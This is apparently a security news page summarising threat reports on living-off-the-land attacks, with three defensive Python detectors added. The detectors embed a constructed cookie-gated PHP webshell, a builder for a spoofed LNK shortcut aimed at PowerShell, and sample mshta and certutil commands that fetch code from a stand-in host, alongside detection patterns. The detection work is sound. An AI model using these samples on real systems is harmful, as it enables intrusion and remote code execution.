< ciso brief />

All news with the #living off the land tag

34 articles

Legacy MSHTA Utility Still Widely Abused by Malware

🛡️ Bitdefender reports that Microsoft’s MSHTA (Microsoft HTML Application Host), a remnant from Internet Explorer, is actively abused as a living-off-the-land binary in ongoing malware campaigns. Attackers use it to execute obfuscated HTA content, launch PowerShell, and fetch loaders and stealers such as CountLoader, LummaStealer, Amatera and PurpleFox. Campaigns rely on fake downloads, cracked apps, SEO-poisoned pages and Discord phishing to trick victims into executing payloads. Because MSHTA is Microsoft-signed and preinstalled, it remains implicitly trusted and attractive to adversaries.

ClickFix and PySoxy Combined to Maintain Persistence

🔐 ReliaQuest researchers describe a campaign where social-engineering ClickFix techniques were paired with the decade-old Python SOCKS5 proxy PySoxy to maintain persistent access on compromised hosts. Attackers staged the proxy after reconnaissance and used a scheduled task for re-execution, so blocking the initial ClickFix vector did not fully remove access. Analysts advise treating these incidents as active compromises and hunting for Python proxy artifacts, scheduled tasks, and staged components rather than assuming a blocked C2 equals containment.

macOS LOTL Techniques Enable Stealthy Enterprise Attacks

🔍 Cisco Talos research (published 21 April) details how attackers are repurposing native macOS features to execute code, move laterally and evade detection across enterprise environments. Built-in capabilities such as Remote Application Scripting (RAS), Spotlight metadata and AppleScript can be abused to run commands, hide payloads and perform covert data transfer. The findings show gaps in visibility and recommend shifting to process-lineage analysis and tighter MDM controls to reduce exposure.

DPRK-Linked Hackers Use GitHub as C2 in LNK Attacks

🔒 Fortinet FortiGuard Labs reports DPRK-linked actors using GitHub as command-and-control infrastructure in multi-stage LNK-based phishing attacks targeting South Korea. Obfuscated Windows shortcut files drop a decoy PDF and a silent PowerShell script that performs anti-analysis checks, extracts a VBScript, and creates persistence via a scheduled task running every 30 minutes. The script profiles hosts, exfiltrates the data to a GitHub repo under an account such as 'motoralis' with a hard-coded token, and retrieves additional modules or commands from files in the repository to maintain control.

DPRK-linked campaign uses LNK files and GitHub C2 channels

🛡️ Fortinet reports a DPRK-linked espionage campaign leveraging weaponized Windows shortcut (.LNK) files and GitHub repositories as command-and-control channels to target South Korean organizations. The attackers rely on multi-stage PowerShell scripts, progressively embedding decoding functions and encoded payloads inside LNK arguments to evade detection. This approach reflects a living off the land strategy that abuses native Windows utilities and legitimate services.

Qilin and Warlock Ransomware Use Vulnerable Drivers

🔒 Cisco Talos and Trend Micro say Qilin and Warlock ransomware groups have adopted a bring-your-own vulnerable driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious DLL named msimg32.dll that side-loads a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to access physical memory and terminate over 300 EDR drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

Cookie-Controlled PHP Webshell Tradecraft for Linux Hosting

🔒 Threat actors are increasingly abusing HTTP cookies as a stealthy control channel for PHP webshells on Linux hosting platforms. By gating execution on specific cookie values, attackers keep loaders dormant during normal traffic and activate functionality only when exact cookie conditions are met. Variants range from multi-stage loaders that reconstruct functions at runtime to single-file interactive shells, often using base64 reconstruction and layered obfuscation to evade detection. Microsoft's Defender write-up provides detection, hunting and mitigation guidance for these threats.
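The traits described above (a cookie gate that keeps the loader silent for normal visitors, an execution sink, base64 reconstruction of a later stage) can be checked for statically before a file is ever served. The following Python is an added example written for this page, not detection content from Microsoft or anyone else: it decodes base64 string literals a couple of layers deep so that a stage hidden in a literal becomes visible, then scores the file on those traits. Both PHP samples are constructed for the demo, and the indicator lists, weights and thresholds are assumptions, not values from the write-up.

```python
"""Static triage for cookie-gated PHP webshell loaders.

Added example; it is not Microsoft's detection content. Both PHP samples are
constructed for the demo, and the indicator lists, scoring weights and verdict
thresholds are assumptions tuned to the traits described in the summary above.
"""
import base64
import re

COOKIE_GATE = re.compile(r"\$_COOKIE\s*\[")
EXEC_SINK = re.compile(
    r"\b(eval|assert|create_function|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
RECONSTRUCT = re.compile(r"\b(base64_decode|str_rot13|gzinflate|gzuncompress|strrev)\s*\(", re.I)
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def decode_literals(src: str, depth: int = 2) -> str:
    """Append the decoded form of base64 string literals, `depth` layers deep,
    so sinks and sources hidden inside them become visible to the regexes."""
    text, frontier = src, src
    for _ in range(depth):
        decoded = []
        for m in B64_LITERAL.finditer(frontier):
            try:
                blob = base64.b64decode(m.group(1), validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            if all(c.isprintable() or c in "\r\n\t" for c in blob):
                decoded.append(blob)
        if not decoded:
            break
        frontier = "\n".join(decoded)          # only the newest layer is searched next
        text += "\n" + frontier
    return text


def triage(src: str) -> dict:
    """Score one PHP source text on the cookie-gated loader traits."""
    expanded = decode_literals(src)
    raw_sinks = {m.group(1).lower() for m in EXEC_SINK.finditer(src)}
    sinks = {m.group(1).lower() for m in EXEC_SINK.finditer(expanded)}
    hidden = sinks - raw_sinks                 # sinks that only appear after decoding a literal
    cookie_gated = bool(COOKIE_GATE.search(expanded))
    reconstruct = {m.group(1).lower() for m in RECONSTRUCT.finditer(expanded)}
    score = 2 * cookie_gated + 2 * bool(sinks) + bool(reconstruct) + bool(hidden)
    verdict = "likely webshell" if score >= 5 else "suspicious" if score >= 3 else "benign"
    return {"cookie_gated": cookie_gated, "sinks": sorted(sinks), "hidden_sinks": sorted(hidden),
            "reconstruct": sorted(reconstruct), "score": score, "verdict": verdict}


# Constructed stage: the loader only reconstructs this once the cookie gate passes.
STAGE_B64 = base64.b64encode(b"system($_COOKIE['c']);").decode()

# Constructed loader: 404 for everyone without the exact cookie value, eval of a hidden stage otherwise.
LOADER_PHP = """<?php
$k = isset($_COOKIE['__cfid']) ? $_COOKIE['__cfid'] : '';
if ($k !== 'a1b2') { header('HTTP/1.1 404 Not Found'); exit; }
eval(base64_decode('STAGE_B64'));
""".replace("STAGE_B64", STAGE_B64)

# Constructed benign file: reads a cookie but never executes anything derived from it.
BENIGN_PHP = """<?php
session_start();
$theme = isset($_COOKIE['theme']) ? preg_replace('/[^a-z]/', '', $_COOKIE['theme']) : 'light';
echo '<body class="' . htmlspecialchars($theme) . '">';
"""

if __name__ == "__main__":
    for label, src in (("loader", LOADER_PHP), ("benign", BENIGN_PHP)):
        print(label, triage(src))
```

A cookie check on its own is normal PHP, which is why the gate alone does not push a file past the benign threshold; the combination of gate, sink and a stage that only exists after decoding is what the score rewards.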

Attackers Exploiting Trusted Tools: Why You Miss It

⚠️ Attackers increasingly bypass classic defenses by abusing trusted, built-in tools such as PowerShell, WMIC, and Certutil to move laterally, escalate privileges, and maintain persistence without dropping new malware. These Living Off The Land (LOTL) techniques mimic routine admin tasks and produce minimal alerts, creating stealthy blind spots for detection-focused teams. A data-driven Internal Attack Surface Assessment reveals unnecessary access, maps realistic attack paths, and prioritizes low-impact remediations so organizations can harden systems without disrupting workflows.

Ransomware in 2025: Blending In as the Strategy and Response

🔒 Ransomware in 2025 has shifted from noisy breaches to measured, identity-centric operations that mimic legitimate user activity. Attackers commonly gain initial access (about 40% via phishing) then use built-in tools like RDP, PowerShell, and PsExec to move laterally while using valid accounts. Talos highlights manufacturing and professional services as top targets and identifies Qilin as the most prolific group, frequently using double-extortion. Defenders should prioritize identity protections, continuous anomaly monitoring, accurate asset inventories, robust backups, EDR, segmentation, and regular ransomware response testing.

Ransomware Exfiltration Playbook: Abusing Everyday Tools

🔍 The Exfiltration Framework research examines how attackers repurpose legitimate OS utilities, third-party endpoint tools, and cloud clients to move sensitive data while evading traditional detections. The research shows that static IOCs and tool-blocking strategies are frequently ineffective when adversaries operate inside trusted software and infrastructure. By normalizing execution context, parent-child process relationships, network patterns, forensic artifacts, and destination characteristics, the framework exposes stable behavioral signals that persist despite masquerading, renaming, or relocation. It recommends correlating endpoint, network, and cloud telemetry, applying behavioral baselining, and focusing on cumulative transfer analysis rather than single-event or allow-list approaches.

LeakNet Uses Deno Runtime and ClickFix for Stealthy Attacks

🔒 LeakNet has adopted the social-engineering ClickFix lure to gain initial access and now deploys a loader that leverages the legitimate Deno runtime to decode and execute JavaScript in memory. By running signed Deno binaries, operators minimize disk artifacts and evade blocklists, often initiating activity via VBS and PowerShell scripts named like Romeo*.ps1 and Juliet*.vbs. Post-compromise actions include DLL sideloading, PsExec lateral movement, credential discovery, C2 beaconing, and data exfiltration to abused Amazon S3 buckets, offering clear detection opportunities for defenders.

ClickFix Lures Evolve to Deploy New In‑Memory Infostealers

🔒 Researchers warn that criminals have scaled ClickFix social-engineering lures to deliver sophisticated, fileless infostealers via compromised WordPress sites. Rapid7 observed a campaign active since December 2025 that leveraged fake Cloudflare CAPTCHA prompts across more than 250 WordPress domains in 12 countries to trick victims into running obfuscated commands. The chain deploys an in-memory loader called DoubleDonut that injects payloads into legitimate Windows processes, and analysts also observed novel .NET and C++ stealers alongside a new Vidar variant. Microsoft noted a separate campaign that pivots from the Run dialog to Windows Terminal for execution.

Four new techniques show Windows .LNK files are unsafe

⚠ Wietze Beukema disclosed four new LNK techniques that can mislead Windows users by showing harmless shortcut targets while executing different programs. He demonstrated how inconsistent fields in the LNK format — including TargetIDList, EnvironmentVariableDataBlock, LinkInfo, and paired ANSI/Unicode values — let attackers spoof visible destinations, hide command-line arguments, and run concealed binaries. These methods can enable phishing, USB-borne attacks, and stealthy initial access and rely on Windows' normal shortcut handling rather than a traditional software bug. Until mitigations or behavior changes are implemented, treat untrusted .LNK files as potentially dangerous.

Weaponized Windows Shortcuts Deliver Global Group Ransomware

📄 Forcepoint X‑Labs researchers have uncovered a Phorpiex‑backed phishing campaign that weaponizes Windows shortcut (.lnk) files to deploy Global Group ransomware. Attackers send messages with the subject "Your Document" and attachments like "Document.doc.lnk", exploiting hidden file extensions and a Word‑style icon to trick recipients. The .lnk uses built‑in utilities (cmd.exe and PowerShell) and heavily obfuscated commands to fetch and run a second‑stage payload, leveraging Living‑off‑the‑Land techniques so the ransomware executes locally without external C2 communication.
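Both LNK entries above, Wietze Beukema's field-inconsistency techniques and the "Document.doc.lnk" lure, come down to a shortcut whose visible target and executed target do not agree. The following Python is an added example, not code from either report: it builds a minimal shortcut in memory following the MS-SHLLINK layout, parses the fields a triage tool would compare (LinkInfo local base path, StringData arguments, the EnvironmentVariableDataBlock's paired ANSI/Unicode targets) and reports where they disagree or where the arguments are padded out of view. The sample shortcut, the 260-character argument threshold and the 20-space padding threshold are assumptions for the demo, and the parser covers only the structures needed here.

```python
"""Static checks for .LNK files whose displayed and executed targets disagree.

Added example, not code from Forcepoint or Wietze Beukema. It constructs a
minimal shortcut per MS-SHLLINK, parses the fields relevant to target spoofing
and flags inconsistencies. Thresholds in lnk_findings are assumptions.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
ENV_BLOCK_SIG = 0xA0000001                       # EnvironmentVariableDataBlock
# LinkFlags bits used here (MS-SHLLINK 2.1.1)
HAS_LINK_INFO, HAS_ARGUMENTS, IS_UNICODE, HAS_EXP_STRING = 0x2, 0x20, 0x80, 0x200
STRING_DATA = [("name", 0x4), ("relative_path", 0x8), ("working_dir", 0x10),
               ("arguments", 0x20), ("icon_location", 0x40)]


def parse_lnk(data: bytes) -> dict:
    """Return the fields relevant to target spoofing; raise on a non-LNK blob."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    out = {"flags": flags, "local_base_path": None, "strings": {},
           "env_ansi": None, "env_unicode": None}
    pos = 0x4C
    if flags & 0x1:                              # LinkTargetIDList: 2-byte size + items
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfo carries its own total size
        (li_size,) = struct.unpack_from("<I", data, pos)
        li = data[pos:pos + li_size]
        li_flags, _vol_off, lbp_off = struct.unpack_from("<III", li, 8)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath present
            out["local_base_path"] = li[lbp_off:li.index(b"\x00", lbp_off)].decode("cp1252")
        pos += li_size
    unicode = bool(flags & IS_UNICODE)
    for key, bit in STRING_DATA:                 # CountCharacters + chars, no terminator
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            raw = data[pos:pos + (count * 2 if unicode else count)]
            pos += len(raw)
            out["strings"][key] = raw.decode("utf-16-le" if unicode else "cp1252")
    while pos + 4 <= len(data):                  # ExtraData blocks until a size < 4
        (bsize,) = struct.unpack_from("<I", data, pos)
        if bsize < 4:
            break
        (sig,) = struct.unpack_from("<I", data, pos + 4)
        if sig == ENV_BLOCK_SIG:                 # 260 ANSI bytes then 520 UTF-16 bytes
            body = data[pos + 8:pos + bsize]
            out["env_ansi"] = body[:260].split(b"\x00", 1)[0].decode("cp1252")
            out["env_unicode"] = body[260:780].decode("utf-16-le").split("\x00", 1)[0]
        pos += bsize
    return out


def lnk_findings(parsed: dict) -> list:
    """Flag fields that should agree but do not, and arguments built to fall out of view."""
    findings = []
    shown, ansi, uni = parsed["local_base_path"], parsed["env_ansi"], parsed["env_unicode"]
    if ansi is not None and uni is not None and ansi.lower() != uni.lower():
        findings.append(f"env block ANSI/Unicode targets disagree: {ansi!r} vs {uni!r}")
    for label, exp in (("ANSI", ansi), ("Unicode", uni)):
        if shown and exp and shown.lower() != exp.lower():
            findings.append(f"LinkInfo path {shown!r} differs from env block {label} target {exp!r}")
    args = parsed["strings"].get("arguments", "")
    if len(args) > 260:                          # assumption: longer than the Properties box shows
        findings.append(f"arguments are {len(args)} chars long")
    if re.search(r"[ \t]{20,}", args):           # padding that pushes the real command out of view
        findings.append("arguments contain a long whitespace run")
    return findings


def build_lnk(shown_path: str, arguments: str, env_ansi: str, env_unicode: str) -> bytes:
    """Constructed sample shortcut: LinkInfo shows shown_path, the env block carries the targets."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE | HAS_EXP_STRING
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)              # archive attr, SW_SHOWNORMAL
    volume = struct.pack("<IIII", 0x11, 3, 0x12345678, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    path = shown_path.encode("cp1252") + b"\x00"
    lbp_off = 0x1C + len(volume)
    suffix_off = lbp_off + len(path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, 0x1C, lbp_off, 0, suffix_off)
    link_info += volume + path + b"\x00"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    env = struct.pack("<II", 0x314, ENV_BLOCK_SIG)
    env += env_ansi.encode("cp1252").ljust(260, b"\x00")
    env += env_unicode.encode("utf-16-le").ljust(520, b"\x00")
    return header + link_info + args + env + struct.pack("<I", 0)   # TerminalBlock


if __name__ == "__main__":
    sample = build_lnk(r"C:\Users\Public\report.pdf",
                       " " * 300 + "-NoProfile -Command placeholder",
                       r"C:\Users\Public\report.pdf",
                       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
    for line in lnk_findings(parse_lnk(sample)):
        print("-", line)
```

The check is deliberately about agreement between fields rather than about any one field's value: a shortcut whose LinkInfo path, ANSI target and Unicode target all name the same binary, with short arguments, produces no findings, which is what the mail gateway or EDR triage should see for a legitimate shortcut.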

DEAD#VAX Campaign Deploys Encrypted AsyncRAT In-Memory

🔒 A newly disclosed campaign dubbed DEAD#VAX leverages IPFS-hosted VHD lures and extreme script obfuscation to mount a virtual drive disguised as a PDF and load an encrypted AsyncRAT payload entirely in memory. Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee describe a multi-stage chain using WSF, obscured batch scripts, and self-parsing PowerShell to decrypt and inject x64 shellcode into trusted, Microsoft-signed processes. The attack avoids writing a recognizable executable to disk, establishes persistence via scheduled tasks, and throttles activity to reduce detection and forensic footprint.

ClickFix Uses Signed App-V Scripts to Deploy Amatera

🔒 Blackpoint researchers describe a campaign that chains ClickFix-style fake CAPTCHA prompts with a signed Microsoft App-V script to proxy PowerShell and deliver the Amatera information stealer. Victims are tricked into pasting a command into the Windows Run dialog that abuses SyncAppvPublishingServer.vbs to load an in-memory loader, which pulls configuration from a public Google Calendar and retrieves a PNG containing an encrypted PowerShell payload. The attack targets systems with App-V enabled (Enterprise/Education), relies on manual user interaction, and uses living-off-the-land techniques and trusted services to frustrate detection and automated analysis.

ClickFix attacks abuse Windows App-V to deliver Amatera

🔒 A recent campaign blends the ClickFix social-engineering method with a fake CAPTCHA and a signed Microsoft App-V script to deliver the Amatera infostealer. Attackers use the trusted SyncAppvPublishingServer.vbs executed via wscript.exe to proxy PowerShell and evade detection, then fetch configuration from a public Google Calendar. Later stages hide encrypted PowerShell payloads in PNGs via LSB steganography and execute Amatera in memory. Researchers recommend removing unused App-V components, restricting the Run dialog, enabling PowerShell logging, and monitoring outbound connection anomalies.
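The MSHTA entry at the top of this page and the two App-V ClickFix entries above all hinge on process lineage: a Microsoft-signed script host launched from an interactive parent and then spawning PowerShell, with the real work in the command line. The following Python is an added example, not detection content from Bitdefender, Blackpoint, Microsoft or any other source summarised here: it walks parent-child links across a set of process-creation records and applies a handful of lineage rules. The record layout mimics the fields of a Sysmon process-creation event, and the sample rows (including the hosts in them) are constructed for the demo.

```python
"""Process-lineage hunt for living-off-the-land chains (mshta, App-V script, Run-dialog PowerShell).

Added example; it is not detection content from any of the reports summarised on this
page. Rows mimic Sysmon Event ID 1 fields (pid, ppid, image, cmdline); the row layout,
the rule set and the sample events are constructed for the demo.
"""
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: the parents a pasted ClickFix command is launched from (Run dialog, terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Command-line fragments that fetch or decode code rather than run a local script file.
FETCH_OR_DECODE = re.compile(
    r"https?://|\biex\b|invoke-expression|downloadstring|frombase64string|-enc(odedcommand)?\b|-urlcache",
    re.IGNORECASE)


def image_name(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def lineage(events: list, pid: int) -> list:
    """Image names from pid up to the oldest ancestor present in this event set."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:     # `seen` guards against pid reuse loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def hunt(events: list) -> list:
    """Return one hit per (event, rule) pair, in event order."""
    hits = []
    for e in events:
        chain = lineage(events, e["pid"])
        me, parent = chain[0], (chain[1] if len(chain) > 1 else "")
        cmd = e["cmdline"]
        fired = []
        if me in SHELLS and parent in SCRIPT_HOSTS:
            fired.append("script host spawned a shell")
        if me == "mshta.exe" and FETCH_OR_DECODE.search(cmd):
            fired.append("mshta given remote or inline code")
        if "syncappvpublishingserver.vbs" in cmd.lower() and parent in INTERACTIVE_PARENTS:
            fired.append("App-V publishing script started from an interactive parent")
        if me in SHELLS - {"cmd.exe"} and parent in INTERACTIVE_PARENTS and FETCH_OR_DECODE.search(cmd):
            fired.append("interactive PowerShell fetching or decoding code")
        if me == "certutil.exe" and re.search(r"-urlcache|-decode", cmd, re.IGNORECASE):
            fired.append("certutil used as downloader/decoder")
        for rule in fired:
            hits.append({"pid": e["pid"], "rule": rule, "chain": " > ".join(reversed(chain))})
    return hits


# Constructed sample: one benign admin session and three LOTL chains under explorer.exe (Run dialog).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 310, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/update.hta"},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;iex (placeholder)"'},
    {"pid": 510, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoProfile -Command iex (placeholder)"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://cdn.example.invalid/a.bin a.bin"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f'pid {h["pid"]}: {h["rule"]}  [{h["chain"]}]')
```

The benign rows (an admin running cmd.exe and a local .ps1 from Explorer) produce nothing, because none of the rules keys on a binary name alone; each needs the parent and the command line to agree on a suspicious story, which is the process-lineage approach the macOS and ransomware entries on this page also recommend.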

Webinar: AI-Powered Zero Trust to Expose Fileless Attacks

🔍 This contributed webinar from Zscaler Internet Access examines how today’s attacks often run “hidden in plain sight,” abusing trusted tools and developer workflows instead of delivering conventional binaries. The session covers living off the land techniques, fileless “last mile” reassembly via obfuscated HTML/JavaScript, and the risks in CI/CD and third‑party repositories. It explains how cloud‑native inspection, behavioral analysis, and zero‑trust design can restore visibility and surface relevant activity without slowing the business.

Nezha Monitoring Tool Repurposed as Post-Exploitation RAT

🔍 A legitimate open-source server monitoring platform, Nezha, is being abused by threat actors as a post-exploitation remote access tool. Ontinue's Cyber Defense Center found attackers silently installing the agent to gain SYSTEM/root privileges and execute remote commands, file transfers and interactive shells. Because the software is legitimate and shows zero detections on VirusTotal, signature-based defenses often fail to flag this misuse. The campaign highlights the challenge of distinguishing benign tools from adversary activity.

CountLoader and GachiLoader Campaigns Abuse Cracked Software

🔒 Researchers disclosed two linked campaigns that abuse cracked-software sites and compromised YouTube accounts to deliver the modular loaders CountLoader and GachiLoader. CountLoader 3.2 is distributed via malicious ZIPs hosted on MediaFire and uses a renamed Python binary invoked through mshta.exe to establish persistence with scheduled tasks that mimic Google and fetch next-stage payloads. Check Point described GachiLoader, an obfuscated Node.js loader spread through a "YouTube Ghost Network" that deploys novel PE injection via a Kidkadi stage. Both campaigns emphasize in-memory execution, signed-binary abuse, removable-media spread, and sophisticated evasion.